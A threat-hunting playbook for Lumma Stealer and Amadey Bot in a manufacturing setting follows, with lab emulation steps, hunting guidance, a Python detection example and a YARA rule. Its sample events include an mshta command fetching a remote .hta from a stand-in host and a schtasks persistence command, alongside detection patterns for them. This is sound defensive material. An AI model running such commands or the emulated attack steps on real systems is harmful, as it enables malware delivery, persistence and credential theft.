Lumma Stealer and Amadey Bot in Manufacturing

A threat actor has gained initial access to the manufacturing network and is utilizing the Lumma Stealer and Amadey Bot malware to steal sensitive data and maintain persistence.

Name:
Lumma Stealer and Amadey Bot in Manufacturing

TTP:
T1071.001 Application Layer Protocol: Web Protocols, T1041 Exfiltration Over C2 Channel, T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, T1552.001 Unsecured Credentials: Credentials In Files

Hypothesis:

A threat actor has gained initial access to the manufacturing network and is utilizing the Lumma Stealer and Amadey Bot malware to steal sensitive data and maintain persistence.

Campaign Type:
Hybrid

Data Sources:

  • Endpoint Security Logs (EDR)
  • Network Traffic Logs (Firewall, IDS/IPS)
  • Windows Event Logs (Security, System, Application)
  • Cloud Storage Logs (if applicable)

Tools:

  • SIEM (e.g., QRadar, Azure Sentinel, ELK)
  • Endpoint Detection and Response (EDR) Tool
  • Network Analysis Tool (e.g., Wireshark)
  • Malware Analysis Sandbox

Scenario:

Initial Access: Phishing email with a malicious attachment or link, or exploitation of a vulnerability in an internet-facing system.

Execution: Lumma Stealer is executed, collecting system information, credentials, and sensitive data.

Command and Control: Amadey Bot establishes communication with a C2 server, enabling remote control and tasking.

Defense Evasion: Lumma Stealer and Amadey Bot employ various techniques to evade detection, such as obfuscation and anti-analysis checks.

Persistence: Amadey Bot establishes persistence mechanisms, ensuring continued access to the compromised system.

Credential Access: Lumma Stealer targets stored credentials and browser data, compromising user accounts.

Lateral Movement: The threat actor uses the stolen credentials to move laterally within the network and reach critical systems.

Exfiltration: Stolen data is exfiltrated to the attacker’s C2 server or cloud storage.

Impact: Data breach, financial loss, disruption of operations, reputational damage.

Hunting Strategy:

  1. Analyze Endpoint Logs: Search for suspicious processes related to Lumma Stealer and Amadey Bot, unusual file activity, and network connections to known C2 servers.
  2. Inspect Network Traffic: Identify anomalous network traffic patterns, including connections to suspicious domains and data exfiltration attempts.
  3. Correlate Events: Connect events across different data sources to identify a potential attack timeline and the extent of compromise.
  4. Investigate Outliers: Focus on unusual user activity, unexpected data transfers, and deviations from established baselines.
  5. Validate Threats: Analyze suspicious files and network traffic in a sandbox environment to confirm malicious behavior.
  6. Remediation: Isolate compromised systems, remove malware, reset compromised credentials, patch vulnerabilities.
  7. Reporting: Document findings, including IOCs, attack timeline, and remediation actions. Share information with relevant stakeholders.

False Positive Consideration:

  • Legitimate use of remote administration tools or cloud storage services.
  • Benign files or network traffic flagged as suspicious due to heuristics.

Recommendations:

  • Implement strong email security controls, including spam filtering and user awareness training.
  • Regularly update and patch systems to mitigate vulnerabilities.
  • Enforce multi-factor authentication and strong password policies.
  • Monitor network traffic for suspicious activity and block known malicious domains.
  • Deploy EDR solutions for real-time threat detection and response.
  • Regularly back up critical data and systems.
  • Develop an incident response plan to effectively handle security incidents.

Step 1: Prepare the Environment

  • Set up a test environment: This should include a Windows domain controller, a few Windows 10 or 11 endpoints, and a network security monitoring solution (e.g., Zeek, Suricata).
  • Install security monitoring tools: Deploy an EDR agent on each endpoint and configure logging for relevant security events.
  • Centralize logging: Forward logs to a SIEM (e.g., QRadar, Splunk, Elastic Stack) for analysis and correlation.
  • Enable auditing: Configure Windows audit policies to capture events related to process creation, file access, network connections, and registry modifications.

Step 2: Emulate Initial Access

  • Phishing email: Send a phishing email to a user in the test environment. Include a malicious attachment (e.g., a weaponized Office document) or a link to a malicious website hosting the Lumma Stealer payload.
  • Vulnerability exploitation: Exploit a known vulnerability in an internet-facing system within the test environment to deliver the Lumma Stealer payload.

Step 3: Emulate Lumma Stealer Execution

  • Execute Lumma Stealer: Run the Lumma Stealer payload on an endpoint within the test environment.
  • Monitor behavior: Observe Lumma Stealer’s actions, including:
    • Collection of system information
    • Gathering of credentials from browsers and other sources
    • Exfiltration of data to a remote server

Step 4: Emulate Amadey Bot Infection

  • Download Amadey Bot: Simulate the download of Amadey Bot by Lumma Stealer.
  • Execute Amadey Bot: Run Amadey Bot on the infected endpoint.
  • Monitor C2 communication: Observe Amadey Bot establishing communication with a simulated C2 server.

Step 5: Emulate Post-Compromise Activities

  • Persistence: Configure Amadey Bot to establish persistence on the infected endpoint (e.g., create a scheduled task).
  • Credential Access: Use the stolen credentials to access other systems within the test environment.
  • Lateral Movement: Simulate lateral movement by using remote access tools or exploiting vulnerabilities on other systems.
  • Data Exfiltration: Exfiltrate sensitive data from the compromised systems to a designated server within the test environment.

Step 6: Collect and Analyze Logs

  • Gather logs: Collect security event logs from the endpoints, network security monitoring solution, and SIEM.
  • Analyze logs: Use the SIEM or other analysis tools to search for events related to the emulated attack techniques.
  • Filter events: Focus on events related to:
    • Suspicious process execution (e.g., “ssh.exe” with unusual parameters, “mshta.exe” executing remote content)
    • Network connections to suspicious domains
    • File modifications in sensitive directories
    • Registry key changes related to persistence
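The filtering in Step 6 and the correlation in Hunting Strategy steps 1 to 3, as an added Python example that is not part of this playbook: it applies two of the listed checks (mshta.exe launched with a URL, a scheduled task created from a user-writable path) plus a domain watchlist to constructed sample events, and groups the hits per host into a time-ordered timeline. The event field names, host names and domains are assumptions of the example, not values from the page.

```python
from collections import defaultdict
from pprint import pprint

# Constructed sample events (not real telemetry); field names are this example's own schema.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:12:03Z", "host": "eng-ws-07", "type": "process",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://cdn-update.example/s.hta"},
    {"ts": "2024-05-01T09:12:05Z", "host": "eng-ws-07", "type": "network",
     "image": "C:\\Windows\\System32\\mshta.exe", "dst": "cdn-update.example", "port": 80},
    {"ts": "2024-05-01T09:13:40Z", "host": "eng-ws-07", "type": "process",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /sc minute /mo 1 /tn Update /tr C:\\Users\\Public\\svc.exe"},
    {"ts": "2024-05-01T10:02:11Z", "host": "hr-ws-02", "type": "process",
     "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /sc daily /tn Backup /tr \"C:\\Program Files\\Backup\\run.exe\""},
]

# A scheduled task whose action lives in a user-writable directory is the Step 5 persistence pattern to review.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")

def flag_process(ev):
    """Return a finding label for a suspicious process-creation event, or None."""
    cl = ev["cmdline"].lower()
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    # mshta.exe handed a URL: the "mshta.exe executing remote content" filter from Step 6
    if image == "mshta.exe" and ("http://" in cl or "https://" in cl):
        return "mshta_remote_content"
    if image == "schtasks.exe" and "/create" in cl and any(p in cl for p in USER_WRITABLE):
        return "schtask_user_writable_path"
    return None

def flag_network(ev, suspicious_domains):
    """Return a finding label when the destination host is on the hunt's domain watchlist."""
    return "watchlist_domain_contact" if ev["dst"].lower() in suspicious_domains else None

def build_timeline(events, suspicious_domains=frozenset()):
    """Correlate flagged events per host into a time-ordered list (Hunting Strategy step 3)."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = (flag_process(ev) if ev["type"] == "process"
                 else flag_network(ev, suspicious_domains))
        if label:
            per_host[ev["host"]].append((ev["ts"], label, ev.get("cmdline") or ev["dst"]))
    return dict(per_host)  # hosts with no findings are left out

if __name__ == "__main__":
    pprint(build_timeline(SAMPLE_EVENTS, {"cdn-update.example"}))
```

The benign hr-ws-02 task (action under Program Files, no watchlist contact) produces no finding, which is the false-positive case the playbook asks you to keep in mind.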

Step 7: Refine Detections

  • Identify patterns: Analyze the collected logs to identify patterns and refine your detection rules.
  • Develop detection rules: Use YARA, SIGMA, or other threat detection frameworks to create robust detection rules based on the observed indicators of compromise.
  • Document findings: Document your analysis, findings, and detection rules to improve future threat hunting efforts.

Example YARA Rule:

rule lumma_stealer_config
{
  meta:
    description = "Surfaces embedded HTTP(S) URLs for review as possible stealer C2 addresses"

  strings:
    // scheme followed by one or more host characters; '/' must be escaped inside a
    // YARA regex, and [^\s\/] excludes whitespace and the path separator
    $re_c2 = /https?:\/\/[^\s\/]+/

  condition:
    $re_c2
}

This YARA rule matches any string with an http:// or https:// scheme followed by a host, the pattern used for C2 server URLs embedded in Lumma Stealer configurations. Because it matches every such URL, use it to surface candidate files or memory regions for analyst review rather than as a stand-alone alert.

By following these steps, you can emulate a threat hunt for Lumma Stealer and Amadey Bot, refine your detection capabilities, and improve your organization’s security posture against these threats.
